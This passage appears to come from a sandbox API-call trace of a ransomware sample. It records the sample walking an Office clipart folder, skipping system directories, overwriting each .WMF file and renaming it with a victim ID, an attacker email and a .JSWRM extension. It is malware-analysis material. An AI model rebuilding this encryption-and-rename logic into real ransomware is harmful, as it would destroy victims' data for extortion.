ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3040, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187829.WMF", cAlternateFileName="")) returned 1 [0086.865] lstrcmpiW (lpString1="J0187829.WMF", lpString2=".") returned 1 [0086.865] lstrcmpiW (lpString1="J0187829.WMF", lpString2="..") returned 1 [0086.866] lstrcmpiW (lpString1="J0187829.WMF", lpString2="...") returned 1 [0086.866] lstrcmpiW (lpString1="J0187829.WMF", lpString2="windows") returned -1 [0086.866] lstrcmpiW (lpString1="J0187829.WMF", lpString2="recovery") returned -1 [0086.866] lstrcmpiW (lpString1="J0187829.WMF", lpString2="perflogs") returned -1 [0086.866] lstrcmpiW (lpString1="J0187829.WMF", lpString2="documents and settings") returned 1 [0086.866] lstrcmpiW (lpString1="J0187829.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.866] lstrcmpiW (lpString1="J0187829.WMF", lpString2="system volume information") returned -1 [0086.866] lstrcmpiW (lpString1="J0187829.WMF", lpString2="msocache") returned -1 [0086.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0086.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187829.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187829.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187829.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0086.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0086.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187829.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187829.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187829.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0086.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0086.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0086.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0086.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187829.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.867] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12352) returned 1 [0086.867] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3040) returned 0x24d210 [0086.867] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3040, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3040, lpOverlapped=0x0) returned 1 [0086.869] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.869] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3040, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3040, lpOverlapped=0x0) returned 1 [0086.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.869] CloseHandle (hObject=0x314) returned 1 [0086.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0086.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0086.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0086.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0086.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0086.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0086.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0086.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0086.870] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187829.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187829.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0086.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0086.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0086.870] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2480, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187835.WMF", cAlternateFileName="")) returned 1 [0086.870] lstrcmpiW (lpString1="J0187835.WMF", lpString2=".") returned 1 [0086.870] lstrcmpiW (lpString1="J0187835.WMF", lpString2="..") returned 1 [0086.870] lstrcmpiW (lpString1="J0187835.WMF", lpString2="...") returned 1 [0086.871] lstrcmpiW (lpString1="J0187835.WMF", lpString2="windows") returned -1 [0086.871] lstrcmpiW (lpString1="J0187835.WMF", lpString2="recovery") returned -1 [0086.871] lstrcmpiW (lpString1="J0187835.WMF", lpString2="perflogs") returned -1 [0086.871] lstrcmpiW (lpString1="J0187835.WMF", lpString2="documents and settings") returned 1 [0086.871] lstrcmpiW (lpString1="J0187835.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.871] lstrcmpiW (lpString1="J0187835.WMF", lpString2="system volume information") returned -1 [0086.871] lstrcmpiW (lpString1="J0187835.WMF", lpString2="msocache") returned -1 [0086.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0086.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187835.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187835.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187835.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0086.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0086.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187835.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187835.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187835.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0086.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0086.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0086.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0086.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187835.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.871] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9344) returned 1 [0086.871] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2480) returned 0x24d210 [0086.872] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2480, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2480, lpOverlapped=0x0) returned 1 [0086.874] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.874] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2480, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2480, lpOverlapped=0x0) returned 1 [0086.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.874] CloseHandle (hObject=0x314) returned 1 [0086.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0086.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0086.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0086.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0086.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0086.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0086.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0086.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0086.874] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187835.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187835.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0086.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0086.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0086.875] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb3c2ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb3c2ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3fe2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187837.WMF", cAlternateFileName="")) returned 1 [0086.875] lstrcmpiW (lpString1="J0187837.WMF", lpString2=".") returned 1 [0086.875] lstrcmpiW (lpString1="J0187837.WMF", lpString2="..") returned 1 [0086.875] lstrcmpiW (lpString1="J0187837.WMF", lpString2="...") returned 1 [0086.875] lstrcmpiW (lpString1="J0187837.WMF", lpString2="windows") returned -1 [0086.875] lstrcmpiW (lpString1="J0187837.WMF", lpString2="recovery") returned -1 [0086.875] lstrcmpiW (lpString1="J0187837.WMF", lpString2="perflogs") returned -1 [0086.875] lstrcmpiW (lpString1="J0187837.WMF", lpString2="documents and settings") returned 1 [0086.875] lstrcmpiW (lpString1="J0187837.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.875] lstrcmpiW (lpString1="J0187837.WMF", lpString2="system volume information") returned -1 [0086.875] lstrcmpiW (lpString1="J0187837.WMF", lpString2="msocache") returned -1 [0086.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0086.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187837.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187837.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187837.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0086.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0086.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187837.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187837.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187837.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0086.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0086.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0086.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0086.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187837.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.877] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16354) returned 1 [0086.877] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3fe0) returned 0x24d210 [0086.877] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3fe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3fe0, lpOverlapped=0x0) returned 1 [0086.880] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.880] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3fe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3fe0, lpOverlapped=0x0) returned 1 [0086.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.880] CloseHandle (hObject=0x314) returned 1 [0086.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0086.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0086.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0086.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0086.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0086.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0086.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.880] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187837.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187837.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0086.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0086.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0086.885] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb3c2ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb3c2ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14fc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187839.WMF", cAlternateFileName="")) returned 1 [0086.885] lstrcmpiW (lpString1="J0187839.WMF", lpString2=".") returned 1 [0086.885] lstrcmpiW (lpString1="J0187839.WMF", lpString2="..") returned 1 [0086.885] lstrcmpiW (lpString1="J0187839.WMF", lpString2="...") returned 1 [0086.885] lstrcmpiW (lpString1="J0187839.WMF", lpString2="windows") returned -1 [0086.885] lstrcmpiW (lpString1="J0187839.WMF", lpString2="recovery") returned -1 [0086.885] lstrcmpiW (lpString1="J0187839.WMF", lpString2="perflogs") returned -1 [0086.885] lstrcmpiW (lpString1="J0187839.WMF", lpString2="documents and settings") returned 1 [0086.885] lstrcmpiW (lpString1="J0187839.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.885] lstrcmpiW (lpString1="J0187839.WMF", lpString2="system volume information") returned -1 [0086.885] lstrcmpiW (lpString1="J0187839.WMF", lpString2="msocache") returned -1 [0086.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0086.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187839.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187839.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187839.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0086.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0086.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187839.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187839.WMF", cchWideChar=12, 